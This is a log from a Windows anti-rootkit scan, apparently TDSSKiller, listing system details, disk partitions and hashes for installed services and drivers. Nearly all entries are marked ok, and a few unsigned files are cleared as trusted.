21:53:12.0871 0x1cb8  Current date / time: 2015/02/14 21:53:12.0871
21:53:12.0871 0x1cb8  SystemInfo:
21:53:12.0871 0x1cb8  
21:53:12.0871 0x1cb8  OS Version: 6.1.7601 ServicePack: 1.0
21:53:12.0871 0x1cb8  Product type: Workstation
21:53:12.0871 0x1cb8  ComputerName: VIJAY-PC
21:53:12.0887 0x1cb8  UserName: VIJAY
21:53:12.0887 0x1cb8  Windows directory: C:\Windows
21:53:12.0887 0x1cb8  System windows directory: C:\Windows
21:53:12.0887 0x1cb8  Processor architecture: Intel x86
21:53:12.0887 0x1cb8  Number of processors: 2
21:53:12.0887 0x1cb8  Page size: 0x1000
21:53:12.0887 0x1cb8  Boot type: Normal boot
21:53:12.0887 0x1cb8  ============================================================
21:53:15.0133 0x1cb8  KLMD registered as C:\Windows\system32\drivers\88729230.sys
21:53:16.0022 0x1cb8  System UUID: {8A705969-EA06-BB3A-E3FE-13B16BA23A66}
21:53:17.0411 0x1cb8  Drive \Device\Harddisk0\DR0 - Size: 0x4A85D56000 ( 298.09 Gb ), SectorSize: 0x200, Cylinders: 0x9801, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
21:53:17.0426 0x1cb8  ============================================================
21:53:17.0426 0x1cb8  \Device\Harddisk0\DR0:
21:53:17.0426 0x1cb8  MBR partitions:
21:53:17.0426 0x1cb8  \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x63800
21:53:17.0426 0x1cb8  \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x64000, BlocksNum 0x11E40800
21:53:17.0442 0x1cb8  \Device\Harddisk0\DR0\Partition3: MBR, Type 0x7, StartLBA 0x11EA5000, BlocksNum 0x11C0C800
21:53:17.0442 0x1cb8  \Device\Harddisk0\DR0\Partition4: MBR, Type 0x7, StartLBA 0x23AB2000, BlocksNum 0x197C000
21:53:17.0442 0x1cb8  ============================================================
21:53:17.0473 0x1cb8  C: <-> \Device\Harddisk0\DR0\Partition2
21:53:17.0598 0x1cb8  D: <-> \Device\Harddisk0\DR0\Partition3
21:53:17.0691 0x1cb8  E: <-> \Device\Harddisk0\DR0\Partition4
21:53:17.0691 0x1cb8  ============================================================
21:53:17.0691 0x1cb8  Initialize success
21:53:17.0691 0x1cb8  ============================================================
21:53:34.0664 0x1f20  ============================================================
21:53:34.0664 0x1f20  Scan started
21:53:34.0664 0x1f20  Mode: Manual; SigCheck; TDLFS;
21:53:34.0664 0x1f20  ============================================================
21:53:34.0664 0x1f20  KSN ping started
21:53:58.0111 0x1f20  KSN ping finished: true
21:54:01.0434 0x1f20  ================ Scan system memory ========================
21:54:01.0434 0x1f20  System memory - ok
21:54:01.0434 0x1f20  ================ Scan services =============================
21:54:10.0607 0x1f20  CryptSvc - ok
21:54:10.0653 0x1f20  [ 7660F01D3B38ACA1747E397D21D790AF, 04611B43705C064C2A8331F6D3F8E4530295694AE2C3E3EC3F62CFF4A5EFA88D ] DcomLaunch      C:\Windows\system32\rpcss.dll
21:54:10.0747 0x1f20  DcomLaunch - ok
21:54:10.0841 0x1f20  [ 8D6E10A2D9A5EED59562D9B82CF804E1, 888F9650F4E872BA8F4E0C27E38A6672A561042B17EBA40E306A22357965B0AD ] defragsvc       C:\Windows\System32\defragsvc.dll
21:54:10.0950 0x1f20  defragsvc - ok
21:54:11.0012 0x1f20  [ F024449C97EC1E464AAFFDA18593DB88, 7EF1E241892E098A472BCA14C724DFF1AACCF190954AF1C4A38B6D542CC74BD2 ] DfsC            C:\Windows\system32\Drivers\dfsc.sys
21:54:11.0059 0x1f20  DfsC - ok
21:54:11.0106 0x1f20  [ 560B0DCE52DFED6623B27C9BAFA6F236, BB4156BB1CCA64CCDE065870DAE56CD58BF05CEBF7C3B17C7A821FDF02A8B157 ] dg_ssudbus      C:\Windows\system32\DRIVERS\ssudbus.sys
21:54:11.0121 0x1f20  dg_ssudbus - ok
21:54:11.0153 0x1f20  [ E9E01EB683C132F7FA27CD607B8A2B63, 4D9037B458C522874619143A4176BCED42472C68933E6E83D37B67242706F3C4 ] Dhcp            C:\Windows\system32\dhcpcore.dll
21:54:11.0199 0x1f20  Dhcp - ok
21:54:11.0231 0x1f20  [ 1A050B0274BFB3890703D490F330C0DA, 79D74F4679A2EE040FAAF4D0392A9311239A10A5F8A5CCB48656C6F89B6D62FB ] discache        C:\Windows\system32\drivers\discache.sys
21:54:11.0277 0x1f20  discache - ok
21:54:11.0309 0x1f20  [ 565003F326F99802E68CA78F2A68E9FF, ABC42B24DBA4FFC411120E09278EF26AF56CCAB463B69B4BD6C530B4A07063D2 ] Disk            C:\Windows\system32\DRIVERS\disk.sys
21:54:11.0340 0x1f20  Disk - ok
21:54:11.0387 0x1f20  [ 33EF4861F19A0736B11314AAD9AE28D0, 4C4B84365D85758E3263B88F157D8B086B392C6F1EA5F0F3DB6BF87EF90248EC ] Dnscache        C:\Windows\System32\dnsrslvr.dll
21:54:11.0465 0x1f20  Dnscache - ok
21:54:11.0511 0x1f20  [ 366BA8FB4B7BB7435E3B9EACB3843F67, 65B7C61ACF34F1F0149045AA9E09A3F917A927963237A385A914D0B80551DC31 ] dot3svc         C:\Windows\System32\dot3svc.dll
21:54:11.0589 0x1f20  dot3svc - ok
21:54:11.0652 0x1f20  [ 8EC04CA86F1D68DA9E11952EB85973D6, 2E3FBC2D683D1274E8BC45EEEA87D43B77EDDCAAF0D453296D9FDA6B9D717071 ] DPS             C:\Windows\system32\dps.dll
21:54:11.0730 0x1f20  DPS - ok
21:54:11.0777 0x1f20  [ B918E7C5F9BF77202F89E1A9539F2EB4, C589A37DE50BBEF22E2DAA9682EA43147F614AA1AF7DAAA942BA5FC192313A0B ] drmkaud         C:\Windows\system32\drivers\drmkaud.sys
21:54:11.0823 0x1f20  drmkaud - ok
21:54:11.0886 0x1f20  [ 3583A5A8CC2E682BFFBD4630D0FEC08B, FD0F184B358FCECAA763444B414074BEF4E871EB7527D88385519FC158435C72 ] DXGKrnl         C:\Windows\System32\drivers\dxgkrnl.sys
21:54:11.0948 0x1f20  DXGKrnl - ok
21:54:11.0979 0x1f20  [ 8600142FA91C1B96367D3300AD0F3F3A, 5713625E27DF11FAAFDA7AC79899A6AD813166E167088FA990EC5DE87DBE83DF ] EapHost         C:\Windows\System32\eapsvc.dll
21:54:12.0026 0x1f20  EapHost - ok
21:54:12.0213 0x1f20  [ 024E1B5CAC09731E4D868E64DBFB4AB0, AB0826A74BBEE5B7A1B035861B665C79BC98305CFC7D82BEF420558FBD3EE994 ] ebdrv           C:\Windows\system32\DRIVERS\evbdx.sys
21:54:12.0369 0x1f20  ebdrv - ok
21:54:12.0463 0x1f20  [ F289F7EDE8375C33450CBFCF07CDF0CD, 23FBCC2D1750559247E296A8EAB46A7E838189D5425AADD7C1C946BCC2DD1DAD ] eeCtrl          C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys
21:54:12.0713 0x1f20  eeCtrl - ok
21:54:12.0759 0x1f20  [ BF08DE8E4FA1F143D41B3241F7FCE5F6, 4140BE0ECE0D4B8FDD413DBA120F5D7EF6F94628224320EDA2A85E50BEFDA638 ] EFS             C:\Windows\System32\lsass.exe
21:54:12.0806 0x1f20  EFS - ok
21:54:12.0853 0x1f20  [ 0ED67910C8C326796FAA00B2BF6D9D3C, 97FAA7627A162B0AEC15545E0165D13355D535B4157604BB87F8EEB72ECD24A8 ] elxstor         C:\Windows\system32\DRIVERS\elxstor.sys
21:54:12.0884 0x1f20  elxstor - ok
21:54:12.0931 0x1f20  [ 8DE31E848D20C6873A6AC10D9B7C1524, 7FF63C19FCC1B6D6FEDBFDE13EBE139885BEE0D5F6BEF50B37FC3B64980A1F93 ] EraserUtilRebootDrv C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys
21:54:12.0947 0x1f20  EraserUtilRebootDrv - ok
21:54:12.0978 0x1f20  [ 8FC3208352DD3912C94367A206AB3F11, 69B65C12BDADD4B730508674B1B77C5496612B4ACCC447DB9AFE49ADEA8CBF02 ] ErrDev          C:\Windows\system32\drivers\errdev.sys
21:54:12.0993 0x1f20  ErrDev - ok
21:54:13.0056 0x1f20  [ F6916EFC29D9953D5D0DF06882AE8E16, ED41893960018D5EC2F7829B1DE4B6967D9FD074D60B11B9EB854E3E0948EC24 ] EventSystem     C:\Windows\system32\es.dll
21:54:13.0087 0x1f20  EventSystem - ok
21:54:13.0118 0x1f20  [ 2DC9108D74081149CC8B651D3A26207F, 75CB47923A867DDAC512701CE71DFCFC340FC3A2E27F4255D0836A1FBC463176 ] exfat           C:\Windows\system32\drivers\exfat.sys
21:54:13.0165 0x1f20  exfat - ok
21:54:13.0181 0x1f20  [ 7E0AB74553476622FB6AE36F73D97D35, 41463A255FDA1D550B3385EC7C73ABC343B1BBBE9CEE4DF9F2A8B3E7338C4947 ] fastfat         C:\Windows\system32\drivers\fastfat.sys
21:54:13.0227 0x1f20  fastfat - ok
21:54:13.0305 0x1f20  [ 967EA5B213E9984CBE270205DF37755B, 43153E23210B03FAE16897D62D55B8742F834EDC695F8401EAB5DE307F62602D ] Fax             C:\Windows\system32\fxssvc.exe
21:54:13.0352 0x1f20  Fax - ok
21:54:13.0383 0x1f20  [ E817A017F82DF2A1F8CFDBDA29388B29, 4CC9320A21E6FEA2D16C48D6BEA14391B695BD541A3C5FDDAEEE086A414FC837 ] fdc             C:\Windows\system32\DRIVERS\fdc.sys
21:54:13.0399 0x1f20  fdc - ok
21:54:13.0430 0x1f20  [ F3222C893BD2F5821A0179E5C71E88FB, A85B947249DBB986358CCD4B158DD58A9301F074F3C6CCCDEF2D01F432E59D1B ] fdPHost         C:\Windows\system32\fdPHost.dll
21:54:13.0461 0x1f20  fdPHost - ok
21:54:13.0461 0x1f20  [ 7DBE8CBFE79EFBDEB98C9FB08D3A9A5B, 0E76C29D2A974A3F2FBFCB63D066D4136B78E02F6B1F579B1865CA7A76193987 ] FDResPub        C:\Windows\system32\fdrespub.dll
21:54:13.0508 0x1f20  FDResPub - ok
21:54:13.0539 0x1f20  [ 6CF00369C97F3CF563BE99BE983D13D8, F65F35324A2FB9DFB533B1C4D089D990CC242218FE83414329D07B786D8EFF33 ] FileInfo        C:\Windows\system32\drivers\fileinfo.sys
21:54:13.0555 0x1f20  FileInfo - ok
21:54:13.0571 0x1f20  [ 42C51DC94C91DA21CB9196EB64C45DB9, 388C68D12ECC8FFE3116FEAAF4DB7B80CF4A3F97E935788DD21C6ADE2369F635 ] Filetrace       C:\Windows\system32\drivers\filetrace.sys
21:54:13.0617 0x1f20  Filetrace - ok
21:54:13.0633 0x1f20  [ 87907AA70CB3C56600F1C2FB8841579B, CA1CD82A1CD453617CE5EA431A1836997F14E3580554E8A516D9FE1E9926D979 ] flpydisk        C:\Windows\system32\DRIVERS\flpydisk.sys
21:54:13.0664 0x1f20  flpydisk - ok
21:54:13.0711 0x1f20  [ 7520EC808E0C35E0EE6F841294316653, 6EC65511B4838A7172A8F89E35C2F9DF4F0BFCE3BE12EDA790F3EB567102FF67 ] FltMgr          C:\Windows\system32\drivers\fltmgr.sys
21:54:13.0742 0x1f20  FltMgr - ok
21:54:13.0805 0x1f20  [ E12C4928B32ACE04610259647F072635, B71B9C2DF45F33C4DAC88435129B08B0BCDBBE82E8C3AD0A95F00137CC8B619F ] FontCache       C:\Windows\system32\FntCache.dll
21:54:13.0883 0x1f20  FontCache - ok
21:54:13.0945 0x1f20  [ E56F39F6B7FDA0AC77A79B0FD3DE1A2F, DBED26852B99B362152DA9CD4F31A1883EF6F9B496F3CF3772A197BA72DB61DA ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
21:54:13.0961 0x1f20  FontCache3.0.0.0 - ok
21:54:13.0976 0x1f20  [ 1A16B57943853E598CFF37FE2B8CBF1D, 87609F46F3B8123552141FD70866E895220B1BBD92BC2B580CAF49201AA0197E ] FsDepends       C:\Windows\system32\drivers\FsDepends.sys
21:54:14.0007 0x1f20  FsDepends - ok
21:54:14.0023 0x1f20  [ 7DAE5EBCC80E45D3253F4923DC424D05, 8A2C4D5591509B0B0A44583520617A9AE34F32BB6E68A012A7D7870ED24F703A ] Fs_Rec          C:\Windows\system32\drivers\Fs_Rec.sys
21:54:14.0039 0x1f20  Fs_Rec - ok
21:54:14.0117 0x1f20  [ E306A24D9694C724FA2491278BF50FDB, 1D246B9C28550640EACBF8CF9DC980FD75106B92832D392FEBEF0C7012353091 ] fvevol          C:\Windows\system32\DRIVERS\fvevol.sys
21:54:14.0148 0x1f20  fvevol - ok
21:54:14.0179 0x1f20  [ 65EE0C7A58B65E74AE05637418153938, 0E1A398ADD8411AF4CCC3344D67BE1B261320C58328BD5C5855A357476FAEBEF ] gagp30kx        C:\Windows\system32\DRIVERS\gagp30kx.sys
21:54:14.0195 0x1f20  gagp30kx - ok
21:54:14.0257 0x1f20  [ C44D560E441F091EA3B72F778EC60DE2, 1F90BA0E98C436B98BF6B0BC93146B52C081DF374424E2DCA270316D508A59B2 ] GameConsoleService C:\Program Files\HP Games\HP Game Console\GameConsoleService.exe
21:54:14.0273 0x1f20  GameConsoleService - ok
21:54:14.0366 0x1f20  [ E897EAF5ED6BA41E081060C9B447A673, A428DC68516F19C6C53A8B62E4BDB2587E70FB751B9D77700B6B147D347DA157 ] gpsvc           C:\Windows\System32\gpsvc.dll
21:54:14.0444 0x1f20  gpsvc - ok
21:54:14.0460 0x1f20  [ C44E3C2BAB6837DB337DDEE7544736DB, 88A24FF7D2FECCEAFFD421B2039A0FB623DA47A6B220B80EF1E52DD26D9E222D ] hcw85cir        C:\Windows\system32\drivers\hcw85cir.sys
21:54:14.0522 0x1f20  hcw85cir - ok
21:54:14.0553 0x1f20  [ A5EF29D5315111C80A5C1ABAD14C8972, A181DA72E946F121C3F4A19438C547B0BFD15138AB1DB5465945EC89DF1F6B0A ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
21:54:14.0600 0x1f20  HdAudAddService - ok
21:54:14.0631 0x1f20  [ 9036377B8A6C15DC2EEC53E489D159B5, 1E56D2ACFE92E6DF96D755B05C63D580EED82C210F075C8623E138BEE6BCD41B ] HDAudBus        C:\Windows\system32\drivers\HDAudBus.sys
21:54:14.0663 0x1f20  HDAudBus - ok
21:54:14.0694 0x1f20  [ 1D58A7F3E11A9731D0EAAAA8405ACC36, 7056FA18B86FBD52C4A6092D80476C02553EA053D6A0BEDB01A2FA5E152D5215 ] HidBatt         C:\Windows\system32\DRIVERS\HidBatt.sys
21:54:14.0725 0x1f20  HidBatt - ok
21:54:14.0756 0x1f20  [ 89448F40E6DF260C206A193A4683BA78, 71E0FCC32AE6FF8DFF420DB0383D6A200E1EAE14BD2E32453F92CE18B31C1F3C ] HidBth          C:\Windows\system32\DRIVERS\hidbth.sys
21:54:14.0772 0x1f20  HidBth - ok
21:54:14.0803 0x1f20  [ CF50B4CF4A4F229B9F3C08351F99CA5E, B97843620AF80FF0EC8F2C438255C0A42A756C6314FAF3DEF415DE16E14C108F ] HidIr           C:\Windows\system32\DRIVERS\hidir.sys
21:54:14.0834 0x1f20  HidIr - ok
21:54:14.0881 0x1f20  [ 2BC6F6A1992B3A77F5F41432CA6B3B6B, 2AF3312F1C8C8923C0A29AA5DAE57CE269417E53DEA2F0CCCC8DB57029698FE1 ] hidserv         C:\Windows\system32\hidserv.dll
21:54:14.0912 0x1f20  hidserv - ok
21:54:14.0959 0x1f20  [ 10C19F8290891AF023EAEC0832E1EB4D, E208553029488A6EE2F5216CC9FE5F93E9931A94C0D0625253BB159E30642853 ] HidUsb          C:\Windows\system32\DRIVERS\hidusb.sys
21:54:14.0990 0x1f20  HidUsb - ok
21:54:15.0021 0x1f20  [ 196B4E3F4CCCC24AF836CE58FACBB699, 7A2E1F603A073421FA0987EFB96647F1F0F2D4E0C82AA62EBC041585DA811DAF ] hkmsvc          C:\Windows\system32\kmsvc.dll
21:54:15.0084 0x1f20  hkmsvc - ok
21:54:15.0177 0x1f20  [ 6658F4404DE03D75FE3BA09F7ABA6A30, E51D9C1580A283EB862F09B73AAE1B647DD683A53F3DD99834222F12DD15E40F ] HomeGroupListener C:\Windows\system32\ListSvc.dll
21:54:15.0224 0x1f20  HomeGroupListener - ok
21:54:15.0287 0x1f20  [ DBC02D918FFF1CAD628ACBE0C0EAA8E8, 02121800D9062692C102475876AE8143EBE46D855E8328B8CDCFE6A2F0D19696 ] HomeGroupProvider C:\Windows\system32\provsvc.dll
21:54:15.0349 0x1f20  HomeGroupProvider - ok
21:54:15.0427 0x1f20  [ 0141816A095A3F5A83FFA5B4A47B8023, F7B26D707EB817FA0F5BFDFA785370B458AF54C94A1E679B36F6808158EA467C ] HP Health Check Service C:\Program Files\Hewlett-Packard\HP Health Check\hphc_service.exe
21:54:15.0427 0x1f20  HP Health Check Service - detected UnsignedFile.Multi.Generic ( 1 )
21:54:18.0391 0x1f20  Detect skipped due to KSN trusted
21:54:18.0391 0x1f20  HP Health Check Service - ok
21:54:18.0422 0x1f20  [ 1210960FF8928950D2A786895B0C424A, 22C8785E024CFDD3A43FAEAAA96B8332C37E9B6C765AB7AFBCD3DAA2DC9EFFC7 ] HpqKbFiltr      C:\Windows\system32\DRIVERS\HpqKbFiltr.sys
21:54:18.0469 0x1f20  HpqKbFiltr - ok
21:54:18.0516 0x1f20  [ FDF273A845F1FFCCEADF363AAF47582F, 9BB99346A977225EF77261CD3CF4219A238EB06FFE2DB91D00A0037BDCFECEF1 ] hpqwmiex        C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
21:54:18.0531 0x1f20  hpqwmiex - ok
21:54:18.0578 0x1f20  [ 295FDC419039090EB8B49FFDBB374549, 670E8015FD374640C6570F56F7FE8DE4D8F92E7A8072F5D1B2B95D0BD699CEF7 ] HpSAMD          C:\Windows\system32\drivers\HpSAMD.sys
21:54:18.0609 0x1f20  HpSAMD - ok
21:54:18.0687 0x1f20  [ 871917B07A141BFF43D76D8844D48106, 30C702008D0EE57D63F74864967DD19A55A268E77E42B5B3CC73037AD51D2987 ] HTTP            C:\Windows\system32\drivers\HTTP.sys
21:54:18.0765 0x1f20  HTTP - ok
21:54:18.0875 0x1f20  [ F44461E66F1B7DD267957FE9BAA63ED0, 5B51692F1670A43A8C1B9E2EECB4042AB04BA92AAA347405A61D3EA8C478BC5A ] huawei_enumerator C:\Windows\system32\DRIVERS\ew_jubusenum.sys
21:54:19.0031 0x1f20  huawei_enumerator - ok
21:54:19.0171 0x1f20  [ F547F862B8907F1BCBD9B72A72A6449E, 18045A85AF0060E599A386D2F50E333D0ADEBECD2987CB4EE6377D1537197285 ] hwdatacard      C:\Windows\system32\DRIVERS\ewusbmdm.sys
21:54:19.0265 0x1f20  hwdatacard - ok
21:54:19.0421 0x1f20  HWDeviceService.exe - ok
21:54:19.0499 0x1f20  [ 0C4E035C7F105F1299258C90886C64C5, CFB4FBE7B28058E6D3E6E508CF3C1645F6AAE0AFEB4C5364835B9C42311DF0D4 ] hwpolicy        C:\Windows\system32\drivers\hwpolicy.sys
21:54:19.0530 0x1f20  hwpolicy - ok
21:54:19.0639 0x1f20  [ F151F0BDC47F4A28B1B20A0818EA36D6, 84B24B5796D9F70A8C37773F5484A4606CC7908370CCD942627ACBEDC4952D79 ] i8042prt        C:\Windows\system32\drivers\i8042prt.sys
21:54:19.0670 0x1f20  i8042prt - ok
21:54:19.0717 0x1f20  [ 5CD5F9A5444E6CDCB0AC89BD62D8B76E, 72870092A80C6DAE0105025B0ED8B607E98BA81E59298364A7FE4C9C56C68FF0 ] iaStorV         C:\Windows\system32\drivers\iaStorV.sys
21:54:19.0748 0x1f20  iaStorV - ok
21:54:19.0904 0x1f20  [ 3E9213A2A050BF429E91898C90F8B4E3, D80ABE5691087661B19F01927B631CB8C5291120B814B6F863F046E0D643E9E4 ] idsvc           C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
21:54:19.0998 0x1f20  idsvc - ok
21:54:20.0013 0x1f20  IEEtwCollectorService - ok
21:54:20.0045 0x1f20  [ 4173FF5708F3236CF25195FECD742915, 0A9C0701DF6EAC6602BE342FC13C7950EF04BB5BDF7D96C2C5DABBD2A29AA55D ] iirsp           C:\Windows\system32\DRIVERS\iirsp.sys
21:54:20.0076 0x1f20  iirsp - ok
21:54:20.0201 0x1f20  [ B9C54120F46392100478F58F374E5709, A28EE8B0988F580D5984E815FC78DF41B169260814234AA0E453375542D0957B ] IKEEXT          C:\Windows\System32\ikeext.dll
21:54:20.0294 0x1f20  IKEEXT - ok
21:54:20.0341 0x1f20  [ A0F12F2C9BA6C72F3987CE780E77C130, 5F53DF8BE1621AA7DFB655CFD9C95E0AFA1AD3CE2E290E19D7B7FB3C6E380034 ] intelide        C:\Windows\system32\drivers\intelide.sys
21:54:20.0357 0x1f20  intelide - ok
21:54:20.0388 0x1f20  [ 3B514D27BFC4ACCB4037BC6685F766E0, F12D7AC62F8550E6F33B28AD751D8413AB7FFEF963242D99FFA76CE8A48B027A ] intelppm        C:\Windows\system32\DRIVERS\intelppm.sys
21:54:20.0419 0x1f20  intelppm - ok
21:54:20.0481 0x1f20  [ ACB364B9075A45C0736E5C47BE5CAE19, 202F77C659103D2D0E787B8CB0A23BE32EA5AA2E6B3B0A0F0A8DFA906AB3C0C0 ] IPBusEnum       C:\Windows\system32\ipbusenum.dll
21:54:20.0559 0x1f20  IPBusEnum - ok
21:54:20.0575 0x1f20  [ 709D1761D3B19A932FF0238EA6D50200, 0A9D2C3A6E91CA45540555B40CB4E2DF3EBE98C1D164C4EECEE20C86782F5823 ] IpFilterDriver  C:\Windows\system32\DRIVERS\ipfltdrv.sys
21:54:20.0622 0x1f20  IpFilterDriver - ok
21:54:20.0700 0x1f20  [ 58F67245D041FBE7AF88F4EAF79DF0FA, 67468D6A46FF4D87AD321BFEA42F2FC843D09AA292A119C76D4D795D06028F96 ] iphlpsvc        C:\Windows\System32\iphlpsvc.dll
21:54:20.0778 0x1f20  iphlpsvc - ok
21:54:20.0825 0x1f20  [ 4BD7134618C1D2A27466A099062547BF, 20284ABEF4433A59E2981F4143CAEC67DC990864FE0B9E3DC70EE0B88539E964 ] IPMIDRV         C:\Windows\system32\drivers\IPMIDrv.sys
21:54:20.0871 0x1f20  IPMIDRV - ok
21:54:20.0887 0x1f20  [ A5FA468D67ABCDAA36264E463A7BB0CD, EDB828D596E43372F97DAE1AADA46428C4C45FB80646DDC64FAD5F25C826CF63 ] IPNAT           C:\Windows\system32\drivers\ipnat.sys
21:54:20.0965 0x1f20  IPNAT - ok
21:54:20.0996 0x1f20  [ 42996CFF20A3084A56017B7902307E9F, 688176DAB91BE569280E4822E4C5BDE755794D293591C53F8047AD59C441751D ] IRENUM          C:\Windows\system32\drivers\irenum.sys
21:54:21.0027 0x1f20  IRENUM - ok
21:54:21.0027 0x1f20  [ 1F32BB6B38F62F7DF1A7AB7292638A35, 86522358680FBB1CEBC56B4D139290689BB0F71A3EC78CE883E4D75D0B37586F ] isapnp          C:\Windows\system32\drivers\isapnp.sys
21:54:21.0043 0x1f20  isapnp - ok
21:54:21.0090 0x1f20  [ EB34CE31FABD4DC4343FD2AD16D2CAF9, D21C91227A15DA89ECF522345D0AB80B3B7FC24A230596DABDB8BD3B7554CE8C ] iScsiPrt        C:\Windows\system32\drivers\msiscsi.sys
21:54:21.0137 0x1f20  iScsiPrt - ok
21:54:21.0183 0x1f20  [ 65DA9FA42C0972FE5B9B7D6047F06F4C, 602A0A2EA95726FE6988867EB624D911D67D1FA9415AFC96559DE5E031A48FC5 ] JMCR            C:\Windows\system32\DRIVERS\jmcr.sys
21:54:21.0230 0x1f20  JMCR - detected UnsignedFile.Multi.Generic ( 1 )
21:54:24.0132 0x1f20  Detect skipped due to KSN trusted
21:54:24.0132 0x1f20  JMCR - ok
21:54:24.0194 0x1f20  [ ADEF52CA1AEAE82B50DF86B56413107E, A3AE1E96B04AC81665ABBD3CB267DFB3F78376DAE18FB0DBD447908DDAAA22D2 ] kbdclass        C:\Windows\system32\drivers\kbdclass.sys
21:54:24.0210 0x1f20  kbdclass - ok
21:54:24.0257 0x1f20  [ 9E3CED91863E6EE98C24794D05E27A71, 90CF59F20E14E4A5A793266805E82BF7AE1F0CF4C7BAB1FD2EEF3B53C5DF770F ] kbdhid          C:\Windows\system32\drivers\kbdhid.sys
21:54:24.0272 0x1f20  kbdhid - ok
21:54:24.0288 0x1f20  [ BF08DE8E4FA1F143D41B3241F7FCE5F6, 4140BE0ECE0D4B8FDD413DBA120F5D7EF6F94628224320EDA2A85E50BEFDA638 ] KeyIso          C:\Windows\system32\lsass.exe
21:54:24.0303 0x1f20  KeyIso - ok
21:54:24.0335 0x1f20  [ EF88BAC2B489D9C46F4E41ACF0219CD0, BF0FAF51BB6D0E588E53E483EF48D8D96B33544113892CC723CDEFAE7E5FB97A ] KSecDD          C:\Windows\system32\Drivers\ksecdd.sys
21:54:24.0366 0x1f20  KSecDD - ok
21:54:24.0397 0x1f20  [ 49D70660EE8266988C1F99A0297A1430, D17B7A3118DB42358DEA80D8A21C5F1B0CC33BF74F6570676D4708B36BB91FD4 ] KSecPkg         C:\Windows\system32\Drivers\ksecpkg.sys
21:54:24.0413 0x1f20  KSecPkg - ok
21:54:24.0459 0x1f20  [ 89A7B9CC98D0D80C6F31B91C0A310FCD, 4583CAEEE0D50C0C7CE955E533FDA063CDC37B69033D41EF22EF1BA242E4C747 ] KtmRm           C:\Windows\system32\msdtckrm.dll
21:54:24.0491 0x1f20  KtmRm - ok
21:54:24.0553 0x1f20  [ D64AF876D53ECA3668BB97B51B4E70AB, D5C07C019BFEAFBEDC29AB5060356A3B07449712B21B50E03378BEF04AF180F9 ] LanmanServer    C:\Windows\system32\srvsvc.dll
21:54:24.0584 0x1f20  LanmanServer - ok
21:54:24.0600 0x1f20  [ 58405E4F68BA8E4057C6E914F326ABA2, C3E6519A1A38F1B3597D4391E42ABFE8F1F5E86256C4B3BD876CDAD9BB68B0A6 ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
21:54:24.0647 0x1f20  LanmanWorkstation - ok
21:54:24.0740 0x1f20  [ F533084C0538CF414FD36FDCAE727164, C158AA095D8CF922A2D293BB89DAC8CE4823603660985CD04B8CE4761C6BC25A ] Lavasoft Ad-Aware Service C:\Program Files\Lavasoft\Ad-Aware\AAWService.exe
21:54:24.0803 0x1f20  Lavasoft Ad-Aware Service - ok
21:54:24.0865 0x1f20  [ 83D8BE94E1CBCBE2EA8372DB1A95A159, 28D18C7B93EFB6C83023D39A54489DDE98DE578AFCC06DD0712D00DE7CD48968 ] LightScribeService C:\Program Files\Common Files\LightScribe\LSSrvc.exe
21:54:24.0881 0x1f20  LightScribeService - detected UnsignedFile.Multi.Generic ( 1 )
21:54:27.0704 0x1f20  Detect skipped due to KSN trusted
21:54:27.0704 0x1f20  LightScribeService - ok
21:54:27.0876 0x1f20  [ F3FE36DDE7F59B7D4F9581C920670198, 7BBAC481A52FDC1CEAF9B94E710310E6A1D67551A002DC6825A36F79B75E74AC ] LiveUpdate      C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXE
21:54:27.0969 0x1f20  LiveUpdate - ok
21:54:28.0032 0x1f20  [ F7611EC07349979DA9B0AE1F18CCC7A6, 879AA7A391966F00761CA039C25EBC62F6712DD5461694911EEC673E12DE103E ] lltdio          C:\Windows\system32\DRIVERS\lltdio.sys
21:54:28.0079 0x1f20  lltdio - ok
21:54:28.0110 0x1f20  [ 5700673E13A2117FA3B9020C852C01E2, 6684A2905EE8C438F2A64BE47E51A54D287B08DEFB8E0AE7FC2809D845EE3C5F ] lltdsvc         C:\Windows\System32\lltdsvc.dll
21:54:28.0172 0x1f20  lltdsvc - ok
21:54:28.0188 0x1f20  [ 55CA01BA19D0006C8F2639B6C045E08B, 4DBBDC820C514DB18CC13F8EE178F8C4E39C295C6E3C255416C235553CE7BDC1 ] lmhosts         C:\Windows\System32\lmhsvc.dll
21:54:28.0219 0x1f20  lmhosts - ok
21:54:28.0250 0x1f20  [ EB119A53CCF2ACC000AC71B065B78FEF, 1FD60735C4945AE565C223F0B47EAF9602D8777E3D15600914C1A9D761215AF9 ] LSI_FC          C:\Windows\system32\DRIVERS\lsi_fc.sys
21:54:28.0281 0x1f20  LSI_FC - ok
21:54:28.0281 0x1f20  [ 8ADE1C877256A22E49B75D1CC9161F9C, 3D64F233DC866537E50549A7C1A2B40A954055B22F0BDA39825B04C38C607CB7 ] LSI_SAS         C:\Windows\system32\DRIVERS\lsi_sas.sys
21:54:28.0297 0x1f20  LSI_SAS - ok
21:54:28.0313 0x1f20  [ DC9DC3D3DAA0E276FD2EC262E38B11E9, A264990857CBC74036799E17A087130626C0A09BE19879019BAF2D761C62AECC ] LSI_SAS2        C:\Windows\system32\DRIVERS\lsi_sas2.sys
21:54:28.0328 0x1f20  LSI_SAS2 - ok
21:54:28.0344 0x1f20  [ 0A036C7D7CAB643A7F07135AC47E0524, 2F662D07FCB74B8D493156DB555EAA90A47E93CF14C7B30039D2FE47EB8682B8 ] LSI_SCSI        C:\Windows\system32\DRIVERS\lsi_scsi.sys
21:54:28.0359 0x1f20  LSI_SCSI - ok
21:54:28.0375 0x1f20  [ 6703E366CC18D3B6E534F5CF7DF39CEE, 7396B9AF938284D99EC51206A7B2FA4A0DC10A493DCE6707818B03A7473782C4 ] luafv           C:\Windows\system32\drivers\luafv.sys
21:54:28.0422 0x1f20  luafv - ok
